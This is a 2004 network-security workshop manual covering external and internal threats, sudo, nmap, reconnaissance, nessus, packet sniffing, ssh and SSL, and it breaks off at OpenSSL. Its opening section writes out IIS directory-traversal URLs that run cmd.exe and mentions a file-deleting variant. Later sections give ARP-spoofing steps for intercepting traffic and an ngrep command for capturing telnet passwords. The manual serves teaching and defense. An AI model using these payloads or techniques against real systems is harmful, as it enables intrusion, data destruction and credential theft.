ifost security workshop (2004)

8/13/2019 Ifost Security Workshop (2004)

1/83

Ifost Security Workshop

cThe Institute for Open Systems Technologies


2/83

Contents

1 External Threats v

1.1 Using a Remote Vulnerability . . . . . . . . . . . . . . vi

1.2 So whats the problem? . . . . . . . . . . . . . . . . . . viii

1.3 How big is the problem? . . . . . . . . . . . . . . . . . ix

1.4 Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . xii

2 Internal Threats xiii

2.1 Background . . . . . . . . . . . . . . . . . . . . . . . . . xiv

2.2 sudo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv

2.3 Other Root-sharing Techniques . . . . . . . . . . . . . xviii

2.4 Exercises . . . . . . . . . . . . . . . . . . . . . . . . . . xix

3 Casing the Joint xx

3.1 nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi

3.2 Scanning Exercise . . . . . . . . . . . . . . . . . . . . . xxiii

4 Mapping out a network xxiv

4.1 Some Common Protocols . . . . . . . . . . . . . . . . . xxv

4.2 Identifying vulnerabilities . . . . . . . . . . . . . . . . . xxvii

4.3 Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . xxx

ii


3/83

Internet Security

4.4 nessus . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxxi

4.5 sara . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxxii

4.6 nessusand saraexercise . . . . . . . . . . . . . . . . xxxiv

4.7 How to protect yourself . . . . . . . . . . . . . . . . . . xxxvi

5 Minimum levels of sanity xxxvii

5.1 Network sniffing . . . . . . . . . . . . . . . . . . . . . . xxxviii

5.2 ngrep . . . . . . . . . . . . . . . . . . . . . . . . . . . . xl

5.3 ssh . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xli

5.4 TCP/IP Security Exercises . . . . . . . . . . . . . . . . xlii

6 More fun with ssh xliii

6.1 Replacing r* commands . . . . . . . . . . . . . . . . . . xliv

6.2 Going password-less . . . . . . . . . . . . . . . . . . . . xlv

6.3 Front-end passwords . . . . . . . . . . . . . . . . . . . xlvii6.4 X-windows forwarding . . . . . . . . . . . . . . . . . . . xlix

6.5 Port forwarding . . . . . . . . . . . . . . . . . . . . . . . l

6.6 Exercises . . . . . . . . . . . . . . . . . . . . . . . . . . li

7 Secure Sockets Layer Web Servers lii

7.1 Background . . . . . . . . . . . . . . . . . . . . . . . . . liii

7.2 How does HTTPS work? . . . . . . . . . . . . . . . . . . liv

7.3 OpenSSL . . . . . . . . . . . . . . . . . . . . . . . . . . lv

7.4 Terms . . . . . . . . . . . . . . . . . . . . . . . . . . . . lvi

7.5 Getting / Compiling Apache-SSL . . . . . . . . . . . . lvii

7.6 Configuring Apache+SSL . . . . . . . . . . . . . . . . . lviii

7.7 Why does the browser still complain? . . . . . . . . . . lx

iii


4/83

Internet Security

7.8 Other things to know . . . . . . . . . . . . . . . . . . . lxi

8 Firewalls lxii

8.1 HP-UX Instructions . . . . . . . . . . . . . . . . . . . . lxiii

8.2 How to use it . . . . . . . . . . . . . . . . . . . . . . . . lxv

8.3 Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . lxvi

9 Pretty Good Privacy lxvii

9.1 What is PGP? . . . . . . . . . . . . . . . . . . . . . . . . lxviii

9.2 Where do I get it? . . . . . . . . . . . . . . . . . . . . . lxix

9.3 Very first . . . . . . . . . . . . . . . . . . . . . . . . . . lxx

9.4 The second thing to do . . . . . . . . . . . . . . . . . . lxxii

9.5 Sharing with others . . . . . . . . . . . . . . . . . . . . lxxiii

9.6 Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . lxxiv

9.7 Verifying things . . . . . . . . . . . . . . . . . . . . . . . lxxv

9.8 Assert your confidence . . . . . . . . . . . . . . . . . . lxxvi

9.9 Actually using it . . . . . . . . . . . . . . . . . . . . . . lxxvii

9.10Exercise . . . . . . . . . . . . . . . . . . . . . . . . . . . lxxviii

9.11Other things . . . . . . . . . . . . . . . . . . . . . . . . lxxix

9.12Too painful! . . . . . . . . . . . . . . . . . . . . . . . . . lxxx

9.13 What else? . . . . . . . . . . . . . . . . . . . . . . . . . lxxxi

iv


5/83

Chapter 1

External Threats

v


6/83

Internet Security

1.1 Using a Remote Vulnerability

http://server/../../subdir/some/fileis bad

http://server/scripts../../some/program isvery, very bad

Many versions of Windows supports Unicode

There are Unicode alternatives for /

IIS 4 and 5 do not check for them unless patched (17Oct 2000)

Notes. . .

While this example is quite out of date, it illustrates how quite com-

mon pieces of software can be trivially insecure.

A web server should only give out files in a restricted subdirectory.Obviously, if someone requests somedirectory/../../something ,

the correct thing to do is either ignore it, give an error or refuse togo above the top level.

The quickest way to do this is just to check the the sequence ofcharacters in a row.

WinNT supports Unicode filenames, and so there are many varia-tions in its character set to represent the / that separates directoryheirarchies, such as %c1%1c, %c0%9vand many others.

Microsoft released a patch on 17 Oct 2000 to correct this. Butmany system administrators have not applied these patches.

So any hacker wanting to break in merely has to know where theIIS installation is relative to the the system32 directory, and canrun arbitrary commands with the privileges of the web server. Forexample:

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir

vi


7/83

Internet Security

http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

Here we are just running cmd.exe /c dir. Nastier would be some-thing like cmd.exe /c del c:*.*or similar.

vii


8/83

Internet Security

1.2 So whats the problem?

Vendors release patches but system administrators dontapply the patches. . .

Never heard/misheard the announcement?

Cant implement it because of change control?

Couldnt be bothered?

Its not their job?

No administrator is responsible for the system?

Notes. . .

There are many reasons why systems get left unpatched. It is veryhard to know in general, but these are some of the reasons thathave been uncovered in post-hack analysis.

viii


9/83

Internet Security

1.3 How big is the problem?

Hundreds of defaced web-sites each day

Many more compromised systems used for launchingattacks

Notes. . .

The administrators of the attrition mirror (www.attrition.org/mirror/attrition )

get informed by hackers whenever most hacks occur. They thenmirror the site in its hacked form.

It is a very humbling experience seeing the number of web sitesdefaced every day. A good guide to see which vendors are takingsecurity seriously is their statistics pages where they show thechanging proportions of hacking over time. After a vulnerabilityis announced in a given operating system they next few monthsalmost always show a rise in defacements.

Combine this with the internet operating system counter (now a

little out of date, as it was last taken in April 1999) to get an ideaof the relative safety of running each different operating systemas a web server. Or you could use the Netcraft web server survey(http://www.netcraft.com/).

Many systems are used as launching places for further attacks.Numerically, this probably constitutes are large portion of non-defacement break-ins. Heres a message from May 2001 that wassent on the attrition mailing list:

HTML Version w/ Full List of IPs:http://attrition.org/security/commentary/worm01.html

On Tuesday, May 8, Attrition staff received email con-taining a list of 8836 IP addresses that were said to be

victims of the sadmind/IIS Worm. For details on thisworm, you can read a little more about it on the CERTweb site which actually managed to release a timely ad-visory:

http://www.cert.org/advisories/CA-2001-11.html

ix


10/83

Internet Security

To expand on the advisory, this Worm will write to four

different files if it succesfully compromises a remote sys-tem:

files (each 289 bytes):

default.asp

default.htm

index.asp

idnex.htm

Of the 8836 IPs we received, 2247 of them resolved.From here, we broke the list down into a few major typesof machines/names; ADSL boxes, Cable Modems, DHCPservers, DNS machines, DSL boxes, Mail hosts, personalmachines, regular servers (that we would normally con-sider mirror material) and in-addr addresses. The fol-lowing list shows a quick breakdown by numbers, as wellas how many of each we confirmed as defaced:

Count Type Defaced276 adsl not tested129 cable not tested

12 dhcp 12 (100%)59 dns 26 (44%)

150 dsl 100 (66%)358 hostnames 188 (52%)160 in-addr not tested213 mail 79 (37%)890 personal not tested

2247 total

We have taken two copies of the defacements and listedseveral of the hosts.

http://attrition.org/mirror/attrition/2001/05/09/www.bruceflint.com/Mass with hostnames and dns

http://attrition.org/mirror/attrition/2001/05/09/mail.ogd.com/Mass with mail

Given that we do not know the date of the list, the ratherlarge percentage that were compromised, and the sourceof the list, it is believed that all of the IPs were com-promised and defaced at one point or another. For that

x


11/83

Internet Security

reason we are including the full list of (sorted) IPs with

the HTML version of this commentary. It can be found athttp://attrition.org/security/commentary/ shortly after

you receive this mail.

xi


12/83

Internet Security

1.4 Exercise

Pick a favourite company (e.g. Microsoft, IBM,Hewlett-Packard)

Use http://defaced.alldas.de/ to find out whether any of their web sites have been defaced

Use http://www.netcraft.com/ to find out whatthey were running (then and now)

Go to www.securityfocus.com, pick a product andfind some recent vulnerabilities.

Notes. . .

Try not to be too alarmed by what you find. . .

xii


13/83

Chapter 2

Internal Threats

xiii


14/83

Internet Security

2.1 Background

The folklore says:

90% of misuse is from inside the organisation

90% of those are from a system admin

Notes. . .

There does not appear to be any study to back up the above num-bers, but they sound reasonable.

A large proportion of security incidents are performed by staff em-ployed by the company affected. Many of these do not get reported.

A large proportion of this large proportion are incidents in whichthe damage was done by a system administrator. Sometimes thetemptations offered by being able to read and write any file get toodifficult to resist!

Protecting a system againstits own administratorsis usually com-pletely inpractical. Companies often just have to trust adminis-trators to do the right thing. Where this is necessary is oftenin heavily controlled computing environments for example, on-line gambling companies in Australia have to provide good evidencethat they are not making changes to an audited system. To do thisthey often share half of the root password with a government offi-cial (the admins know half, the government knows the other half).Usually changes are done in the presence of other officials.

Implementing schemes such as the above are probably too difficult

and too costly for any normal organisation. As a result, it willbe impossible to adequately protect against a system admin gonerogue.

Proportion By whom Can protect?81% system admin no9 % other internal maybe, local

10 % external usually, remote

xiv


15/83

Internet Security

2.2 sudo

Enables selective root access

Logs all commands to syslog

Allows you to disable root login altogether!

Free, open source, supportable, widely-used

Notes. . .

There are other ways of giving superuser privileges. One of themost popular is sudo. The source can be downloaded from www.courtesan.com/sudo.Pre-compiled HP-UX versions in software distributor package for-mat are available from hpux.cs.utah.edu.

sudoconsists of (essentially) two components: a configuration file(/etc/sudoers) defining what commands are allowed to be run,and by which users; and the set-user-id binary (sudo) which usersinvoke.

To show some of the power of it, here is an example from its manpage.

# sudoers file.

#

#

# Host alias specification

Host Alias HUB=houdini: REMOTE=merlin,kodiakthorn,spirit

Host Alias SERVERS=houdini,merlin, kodiakthorn,spirit Host Alias

CUNETS=128.138.0.0/255.255.0.0 Host Alias CSNETS=128.138.243.0,

128.138.204.0,128.138.205.192

The are four host aliases. The first actually contains two aliases.It sets HUB to be houdini and REMOTE to the three machinesmerlin, kodiakthorn and spirit. Similarly, SERVERS is set to themachines houdini, merlin, kodiakthorn and spirit. The CSNETSalias will match any host on the 128.138.243.0, 128.138.204.0,or 128.138.205.192 nets. The CUNETS alias will match any hoston the 128.138.0.0 (class B) network. Note that these are networkaddresses, not ip addresses. Unless an explicate netmask is given,

xv


16/83


17/83

Internet Security

steve CSNETS=(operator) /usr/op commands/

FULLTIME Full-time sysadmins in the FULLTIME alias may runany command on any host as any user without a password.

%wheel Any user in the UN*X group wheel may run any commandon any host.

PARTTIME Part-time sysadmins in the PARTTIME alias may runany command except those in the SHELLS and SU aliases onany host.

+interns Any user in the netgroup interns may run any commandexcept those in the SHELLS and SU aliases on any host thatis in the openlabs netgroup.

britt The user britt may run commands in the SHUTDOWN aliason the REMOTE machines and commands in the LPCS aliason any machine.

jimbo The user jimbo may su to any user save root on the ma-chines on CUNETS (which is explicately listed as a class B

network).nieusma The user nieusma may run commands in the SHUT-

DOWN alias as well as /etc/reboot on the SERVER machinesand any command except those in the SHELLS alias on theHUB machines.

jill The user jill may run /usr/sbin/shutdown -h now or /usr/sbin/shutdown-r now as well as the commands in the MISC alias on houdini.

markm The user markm may run any command on the HUB ma-chines except /usr/sbin/shutdown, /sbin/halt, and commandslisted in the MISC alias.

davehieb The user davehieb may run any command on merlin asany user in the Runas Alias OP (ie: root or operator). He mayalso run /sbin/halt on the SERVERS and any command onkodiakthorn (no password required on kodiakthorn).

steve The user steve may run any command in the /usr/op commands/directory as user operator on the machines on CSNETS.

xvii


18/83

Internet Security

2.3 Other Root-sharing Techniques

qsu

Set-uid root shell executable only by wheel group

OS-specific tricks (such as sam -r)

Notes. . .

These are just a few thoughts.

xviii


19/83

Internet Security

2.4 Exercises

1. Set up sudo

2. Look at the syslog messages from legitimate opera-tions

3. What happens for illegitimate use?

Notes. . .

xix


20/83

Chapter 3

Casing the Joint

xx


21/83

Internet Security

3.1 nmap

www.insecure.org/nmap

Shows what ports are open

Can do some remote host identification

Is veryheavily used

Ported to WinNT in July 2000

Notes. . .

For totally mindless use, trynmap -A hostnameif it is new enough(past version 3.5) to do version identification. If it is older than this,trynmap -O hostname

Most sites would be scanned with nmap at least 4 to 5 times perday. Cable modem users are choice targets (they are usually runat home and not administered with security in mind) and can easily

be scanned up to 30 or 40 times a day.This means that while intrusion detection systems can pick up onthis kind of scan, there are so many false positives that it is hardto pick out a determined hacker from a casual one.

From the nmap man page

Nmap is designed to allow system administrators and curious in-dividuals to scan large networks to determine which hosts are upand what services they are offering. nmapsupports a large numberof scanning techniques such as: UDP, TCP connect(), TCP SYN (halfopen), ftp proxy (bounce attack), Reverse-ident, ICMP (ping sweep),FIN, ACK sweep, Xmas Tree, SYN sweep, and Null scan. See theScan Types section for more details. nmap also offers a numberof advanced features such as remote OS detection via TCP/IP fin-gerprinting, stealth scanning, dynamic delay and retransmissioncalculations, parallel scanning, detection of down hosts via par-allel pings, decoy scanning, port filtering detection, direct (non-

xxi


22/83

Internet Security

portmapper) RPC scanning, fragmentation scanning, and flexible

target and port specification.

Significant effort has been put into decent nmap performance fornon-root users. Unfortunately, many critical kernel interfaces (suchas raw sockets) require root privileges. nmapshould be run as root

whenever possible.

The result of running nmap is usually a list of interesting ports onthe machine(s) being scanned (if any). Nmapalways gives the portswell known service name (if any), number, state, and protocol.

The state is eitheropen, filtered, or unfiltered. Open means that

the target machine will accept() connections on that port. Filteredmeans that a firewall, filter, or other network obstacle is coveringthe port and preventing nmapfrom determining whether the port isopen. Unfiltered means that the port is known bynmapto be closedand no firewall/filter seems to be interfering with nmaps attemptsto determine this. Unfiltered ports are the common case and areonly shown when most of the scanned ports are in the filtered state.

Depending on options used, nmap may also report the followingcharacteristics of the remote host: OS in use, TCP sequencability,usernames running the programs which have bound to each port,the DNS name, whether the host is a smurf address, and a fewothers.

xxii


23/83

Internet Security

3.2 Scanning Exercise

To use nmapand netcat

Notes. . .

Scan some machine(s) in the network, and identify what operatingsystem it is running, and what network services they offer.

The manpage may be helpful.

xxiii


24/83

Chapter 4

Mapping out a network

xxiv


25/83

Internet Security

4.1 Some Common Protocols

SMTP

POP3

IMAP

telnet

HTTP

Notes. . .

Most of these standard protocols are text-based, and can be ac-cessed using an ordinary telnet program. They often give away

version numbers when you work on them with low-level tools.

telnet jayanya.ifost.org.au smtp

220 jayanya.ifost.org.au ESMTP Sendmail 8.9.3/8.9.3; Wed, 26 Jul2000 18:52:51 +1000

HELO mail.golf.com250 jayanya.ifost.org.au Hello mail.golf.com [172.1.2.3] (may be forged),pleased to meet you

MAIL FROM: [email protected] [email protected]... Sender ok

RCPT TO: [email protected] [email protected]... Recipient ok

DATA354 Enter mail, end with . on a line by itself

Subject: Hello Greg...

Care for a game this afternoon?.250 SAA04289 Message accepted for delivery

QUIT221 jayanya.ifost.org.au closing connection

xxv


26/83

Internet Security

Proto Used for Commands

SMTP E-mail HELO MAIL RCPT DATAQUIT VRFY EXPN

POP3 E-mail USER PASS LIST RETRQUIT

HTTP WWW GET /index.html

xxvi


27/83

Internet Security

4.2 Identifying vulnerabilities

Find out what computers there are

Find out what services there are

Get any version numbers, see if there are knownproblems

Try fuzzing

Notes. . .

Finding what computers there are:

1. From DNS, get NS, MX and A records

2. Tryhost -a domainin case they allow zone transfers

3. Try www.netcraft.com and search for other websites in thatdomain

4. Send an email to someone in the domain (or just aim for abounce message) and look at the Received from headers.This can help find mail servers even if their primary MX isfiltered through a third party virus and spam filter.

5. Do a broadcastpingon each network

6. Try whois ipaddress and look for the inetnum field, whichshould be the whole netblock that IP address came from.

7. Do a traceroute on some addresses you know about and

see what ISP they use. Then try one address below and oneaddress above and see if it goes through the same port on thesame router (suggesting that they are on the same site for thesame organisation). Keep going until you run into somethingthat is definitely someone elses network.

8. nmap -O -sV

9. If you have IPv6, try ping6 -awith any of the a, A, c, l, s, g,which might turn up some IPv4 addresses as well.

xxvii


28/83

Internet Security

10. Use snmpwalk, and look for atTable.afEntry.atNetAddress ipAd-

drEntry, ipAdEntAddr (assuming you can guess a communityname).

11. Try asking someone in the organisation.

To remotely find out what software is installed, and what their ver-sion numbers are:

1. Most mail servers identify their version when you first connect

2. If its sendmail, VRFY root, try other users

3. Identify web server version from the HTTP header also lookfor headers for application servers, PHP and mod perl, andany other third party component.

4. News servers (if there are any) often give their vendor and ver-sion number when you connect to them

5. Send spurious web requests to any web-based applications,and compare the error messages with posts on mailing listsfor that application.

6. Identify any other server software version. Often its as simpleas looking for an about field.

7. You might get the installed software from snmpwalkcommuni-tyname system

8. Try asking someone in the organisation. There may well be acanonical list if they have been following ITIL practices.

9. If you are looking at desktops, the organisation might be run-ning a network management tool which might be able to re-port this information immediately.

There are many lists of security vulnerabilities:

http://www.securityfocus.com/bid has a quite compre-hensive list

xxviii


29/83

Internet Security

CERT (www.cert.org) used to be useful, but is now usually

far too out-of-date

The SANS newsletters http://www.sans.org/newsletters/

The vendors web page.

Fuzzing can sometimes find problems in bespoke software whichhasnt been subjected to a rigorous security review. Simply put,

whenever there is the possibility of input somewhere, send longstreams of random data. Nulls, apostrophes, invalid unicode char-

acters are all good candidates. Odd error messages, services crash-ing, half-finished web pages or other out-of-the-norm activity sug-gests that the software may be vulnerable to buffer over-runs orterm-injection (e.g. SQL injection).

xxix


30/83

Internet Security

4.3 Exercise

To see what you can find out

Notes. . .

Pretend you have never seen this network before. Map out as muchof it as you can, and identify what software is running.

xxx


31/83

Internet Security

4.4 nessus

www.nessus.org

Tests a large number of security flaws

Can quite easily crash the target system

Hasplugins(*.nasl files) updated regularly

Notes. . .

From the man page

The Nessus Security Scanner is a security auditing tool made upof two parts: a server, and a client. The server, nessusd(8) isin charge of the attacks, whereas the client nessus provides aninterface to the user. It comes in two flavours, with and withoutGUI (grephical user interface) support.

As an X11 client, nessus is based on the Gimp ToolKit (GTK) andneeds no arguments upon start up.

xxxi


32/83

Internet Security

4.5 sara

www-arc.com/sara

Based on SATAN

Performs a large number of tests.

Notes. . .

From the introductory documents

What is SARA?

SARA is the Security Auditors Research Assistant. It is a dervedwork of SATAN (Security Administrator Tool for Analyzing Networks)developed by Dan Farmer and Wietse Venema. SATAN can be foundat www.porcupine.org/satan. It enhances SATAN by providing

1. an improved user interface,

2. up to date vulnerability tests, and

3. a commercially supported product, SARA Pro.

The SARA developers cannot emphasize enough that without theSATAN foundation, SARA would not exist. SATAN is the basis ofthe security engine, program architecture, and documentation.

In its simplest (and default) mode, it gathers as much informa-tion about remote hosts and networks as possible by examiningsuch network services as finger, NFS, NIS, ftp and tftp, rexd, andother services. The information gathered includes the presence of

various network information services as well as potential securityflaws usually in the form of incorrectly setup or configured net-

work services, well-known bugs in system or network utilities, orpoor or ignorant policy decisions. It can then either report on thisdata or use a simple rule-based system to investigate any potentialsecurity problems. Users can then examine, query, and analyzethe output with an HTML browser, such as Mosaic or Netscape.

xxxii


33/83

Internet Security

While the program is primarily geared towards analyzing the se-

curity implications of the results, a great deal of general networkinformation can be gained when using the tool - network topology,network services running, types of hardware and software beingused on the network, etc.

However, the real power of SARA comes into play when used inexploratory mode. Based on the initial data collection and a userconfigurable ruleset, it will examine the avenues of trust and de-pendency and iterate further data collection runs over secondaryhosts. This not only allows the user to analyze her or his own net-

work or hosts, but also to examine the real implications inherentin network trust and services and help them make reasonably ed-ucated decisions about the security level of the systems involved.

xxxiii


34/83

Internet Security

4.6 nessus and sara exercise

To see nessusin action

To see sarain action

Notes. . .

If nessus is not already compiled, compile it. You may needthe gtkand gliblibraries for HP-UX these can be found athpux.cs.utah.edu and installed with swinstall.

Run nessus-adduser. When asked for rules, just putdefaultaccept on a line on its own.

Run nessusd -D

If you have a graphical terminal:

Start up the nessusinterfaceClick on login

Select a target, and start the attack

If you dont have a graphical terminal:

Run nessus server port username targets output

servershould be the name of the machine you rannessus-D on; the port defaults to 1241; username is the user-name you specified before; targetsis a plain text file list-ing computers one to a line; output is the file you wantthe output to go into.

This will take some time, often 20-30 minutes or evenlonger. There appears to be no way of getting it to reportits progress on the command line.

The output will be in .nsrformat, which is vaguely read-able. If run with the -T option, other formats can begenerated.

xxxiv


35/83

Internet Security

If you have the ANSI C compiler or gcc on your HP-UX sys-

tem, you should be able to compile sara. Simply type makehpux. When it is finished, run ./sara. . . this should start upnetscape viewing a funny port number.

xxxv


36/83

Internet Security

4.7 How to protect yourself

Keep up-to-date

Shut down anything unnecessary

Notes. . .

There are no magic tricks, crackers are probably working with thesame information that you have available to you. When a security

vulnerability is announced, fix it immediately, and no cracker willhave a chance to exploit it.

You can make your job easier by shutting down unnecessary ser-vices. See section??.

xxxvi


37/83

Chapter 5

Minimum levels of sanity

xxxvii


38/83

Internet Security

5.1 Network sniffing

Sniffing Picking up other computers traffic as it is broad-cast on ethernet

Switch spoofing Forcing a switch to send you other com-puters data

Notes. . .

Hubbed, bridged or single-wire segments are easy to sniff. Mostethernet cards can be put into promiscuousmode which lets themreceive all packets, regardless of whether they are destined for thiscomputer or not. This is fun, because most common protocols sendsecret passwords as plain text (!) which can be sniffed.

Here are a few programs that do this:

telnet

ftp

Any web browser using HTTP

Any mail client using POP or IMAP (which is nearly everything)

Any network management system using SNMP (nearly every-thing)

CVS

Most instant messaging systems

Meeting Maker

Citrix ICA,

Symantec pcAnywhere

Oracle SQL*Net, Sybase and Microsoft SQL Server

xxxviii


39/83

Internet Security

Theres a common misconception that switched networks arent

vulnerable to this. They are, but it is harder. There are two tech-niques: first try faking packets from an absurd number of sourceMAC addresses, which cause a switch to run out of memory andfall back to being a hub; or by switch spoofing. The sequence iscomplicated.

1. Find out the MAC address of the machine you want to inter-cept traffic to. Lets call it 11.12.13.14 with MAC address0x123456789a

2. Pick another MAC address that is not being used. Say0x5555544444.

3. Send an ARP flush broadcast (alert other systems that a failoverhas taken place, and that a new system is providing the for11.12.13.14.

4. Other systems who need to send data will then have to re-request. You then immediately respond by announcing thatthe new MAC address is 0x5555544444. Of course your victim

will also respond, but if youre quick, youll get in first. Repeatthis whenever any computer does an ARP request broadcast.

If youre too slow, just got back to step 3, and try again. Even-tually11.12.13.14will have a busy period, and youll be ableto get in first.

5. You will now receive traffic for that address. Record it, andthen strip off the header saying 0x5555544444and replace it

with a header saying 0x123456789a, and the victim will benone the wiser.

Note that there is no reason why you cant do this against the entire

network simultaneously. You will be noticed by a network manage-ment tool doing a periodic configuration check suddenly severalmachines will have changed MAC addresses, which would be causefor alarm. But used sparingly and with a regular reset back to thereal values, theres a reasonable chance that such a ploy can re-main undetected for a long time.

xxxix


40/83

Internet Security

5.2 ngrep

Among many network sniffers, ngrep is one of thesimplest.

Download it from http://www.packetfactory.net/Projects/ngrep/

Notes. . .

Heres a simple way to get passwords from telnetusers anywhere

on your network ngrep port 23.

dsniffby Dug Song (www.monkey.org/ dugsong/dsniff is a verymuch more sophisticated sniffer, and can decode passwords fromIMAP, POP, telnetand a variety of other protocols.

From the ngrep man page

ngrepstrives to provide most of GNU greps common features, ap-

plying them to the network layer. ngrep

is a pcap-aware tool thatwill allow you to specify extended regular expressions to matchagainst data payloads of packets. It currently recognizes TCP andUDP across ethernet, ppp and slip interfaces, and understands

bpf filter logic in the same fashion as more common packet sniffingtools, such as tcpdump(8)and snoop(1). (Ornettl on HP-UX).

xl


41/83

Internet Security

5.3 ssh

Encrypts all login traffic

Encrypts and simplifies remote X-windows traffic

Can do port forwarding

Can do copying and remote execution

www.openssh.com

Notes. . .

OpenSSH is under a very free license. There is also a commer-cial equivalent, (confusingly called just SSH) from DataFellows(www.ssh.fi).

There are links on the OpenSSH web site for secure shell clientsfor MS-Windows, MacOS and Java.

Teraterm Pro with the TTSSH extension is the most common for

MS-Windows desktops to use SSH. Its free. Visithp.vector.co.jp/authors/VA002416and www.zip.com.au/roca/ttssh.html.

Download it, use it, and turn offtelnetas soon as you can.

xli


42/83

Internet Security

5.4 TCP/IP Security Exercises

To see some TCP/IP protocol problems and fixes

Notes. . .

1. telnetfrom one system to another

2. sshfrom one system to another

3. On a third computer, run ngrep port 23 to watch all trafficon the network on port 23 (the telnetport number). Can yousee anyone logging in, and giving their password?

4. Again, run ngrep port 22to watch all ssh traffic. Can youmake out anything at all?

xlii


43/83

Chapter 6

More fun with ssh

xliii


44/83

Internet Security

6.1 Replacing r* commands

r* command s* commandremsh / rsh ssh

rlogin sloginrcp scp

Notes. . .

And all the other arguments are the same. . . . Note thatremshandrcp will only work if .rhosts is set up; secure shell will just askfor a password.

xliv


45/83

Internet Security

6.2 Going password-less

sshd checks the target users home directory for.ssh/authorized keys

ssh checks the source home directory for.ssh/identity

If an public key in authorized keysmatches the pri-vate key in identity, no login is required

Notes. . .

Setting this up is quite straightforward. The program that does allthe magic is ssh-keygen. There are many options to it (read theman page), but if you run it with no arguments, it will create:

1. .ssh/identity

2. .ssh/identity.pub

You will be asked for a file name to store it in (the default is thefiles above).

You will then be asked for a pass-phrase. You dont need to give one(just press return). If you want to add a pass-phrase later you cando so with ssh-keygen -l(which can also change a pass-phrasedidentity into a non-pass-phrased).

The .ssh/identity.pub file is a single-line, plain text file. (Thefollowing is spread out over multiple lines for readability.

1024 35 1460382080852295179426933454708 250768573286057954897008764048562

268860578538159683162040288584340939787 2341682715452896840404274801742254

183943516979414013456015981186483651934 2927402562129860396276091337941355

065194248915227916485012840512348309633 0269258076489080430619362053279940

55941 [email protected]

Append that line onto the .ssh/authorized keys file of any ac-count you wish to log in to.

xlv


46/83

Internet Security

e.g.

ssh other.ifost.org.au cat >> .ssh/authorized keys < .ssh/identity.pu

xlvi


47/83

Internet Security

6.3 Front-end passwords

If you have a pass-phrase, you will be asked for itevery time

. . . unless SSH AUTH SOCK and SSH AGENT PID are set

The ssh-agentholds the passphrase

Notes. . .

From the ssh-agentman page

The idea is that the agent is run in the users local PC,laptop, or terminal. Authentication data need not bestored on any other machine, and authentication passphrasesnever go over the network. However, the connection tothe agent is forwarded over SSH remote logins, and theuser can thus use the privileges given by the identities

anywhere in the network in a secure way.

If you do have a pass-phrase on your identity, you will be askedfor it every time you perform any kind of s* command. This ismost annoying. So you start a single ssh-agent and all your sshprocesses can communicate with it.

If run with no arguments, ssh-agentwill do two things:

1. Fork into the background

2. Print out shell commands

Here is the output from running ssh-agent:

SSH AUTH SOCK=/tmp/ssh-PQV30761/agent.30761; export

SSH AUTH SOCK;

SSH AGENT PID=27189; export SSH AGENT PID;

echo Agent pid 27189;

xlvii


48/83

Internet Security

We need make sure all those variables are set for the remainder

of our login session, so we do it during login. In your .xsession,.dtprofile, .profile or .bash profile (whatever is appropri-ate), but the following two lines:

eval $(ssh-agent)ssh-add

From thessh-addman page

ssh-add adds RSA or DSA identities to the authentica-tion agent, ssh- agent(1). When run without arguments,it adds the file $HOME/.ssh/identity. Alternative filenames can be given on the command line. If any filerequires a passphrase, ssh-add asks for the passphrasefrom the user.

. . .

If ssh-add needs a passphrase, it will read the passphrase

from the current terminal if it was run from a termi-nal. If ssh-add does not have a terminal associated withit but DISPLAY and SSH ASKPASS are set, it will exe-cute the program specified by SSH ASKPASS and openan X11 window to read the passphrase. This is partic-ularly useful when calling ssh-add from a .Xsession orrelated script. (Note that on some machines it may benecessary to redirect the input from /dev/null to makethis work.)

(Which neglects to mention that if $SSH ASKPASS is not set, but$DISPLAY is, that is will use the path to ssh-askpass that wascompiled in. This is a graphical pass-phrase reader.)

xlviii


49/83

Internet Security

6.4 X-windows forwarding

X-windows connections are forwarded if sshd confighasX11Forwarding yesand. . .

ssh confighas ForwardX11 yes

or the user uses ssh -X

Notes. . .

How it works the DISPLAY environment variable gets set on thetarget host to being something unusual (e.g. target:10). The sshdthen makes a fake tiny X-server listening on service :10, which itencrypts and sends back to the source system. The source systemthen pretends to be an ordinary X-windows program, and displaysthem graphically.

No more need forxhost + insecure!

No more need forxauth complicated!

No problems running X-windows programs through a mas-querading firewall!

xlix


50/83

Internet Security

6.5 Port forwarding

Any TCP service can be forwarded

Securely connect to a POP server

Securely gateway connections to another

Notes. . .

This is best explained by examples:

ssh -L5110:localhost:110 mailserver sleep 45

Set up a tunnel so that when I point my mail reader to my own com-puter on port5110, that it will be tunnelled to mailserver, whereit will become a connection to localhost(on the mailserver) to port110. Since there is no way of sniffing traffic at either end, I cansend passwords as plain text without fear.

ssh -g -R5023:myserver:23 firewall sleep 86400

Make something listen on the computer called firewall on port5023. The-g option allows anyone to connect to it. When someonedoes, there will be a connection established from where I ran sshto the computer called myserver (in my network) on port 23. i.e.

This could be put into a cronjob to connect to a branch office sothat they could use telnet across the greater internet to get into

the office computers.

l


51/83

Internet Security

6.6 Exercises

1. Set up your SSH identity. Experiment.

2. Modify your passphrase, and set up ssh-agent

3. Test out running X-windows programs remotely.

4. (Bonus) Remove your servers identity (usually/etc/ssh host*key). Restart the server. What hap-pens when you next login?

Notes. . .

The last exercise shows how secure shell protects against man-in-the-middle attacks and other such similar tricks.

li


52/83

Chapter 7

Secure Sockets Layer WebServers

lii


53/83

Internet Security

7.1 Background

Developed by Netscape, now an RFC

Secures the connection against eavesdropping

Does not secure the server

Notes. . .

liii


54/83

Internet Security

7.2 How does HTTPS work?

Client connects,

Systems exchange fresh public keys

Systems agree on a symmetric (fast) protocol (e.g.3DES)

Server presents certificate

Client accepts or rejects

(Client presents certificate)

Notes. . .

liv


55/83

Internet Security

7.3 OpenSSL

A library for developing applications with

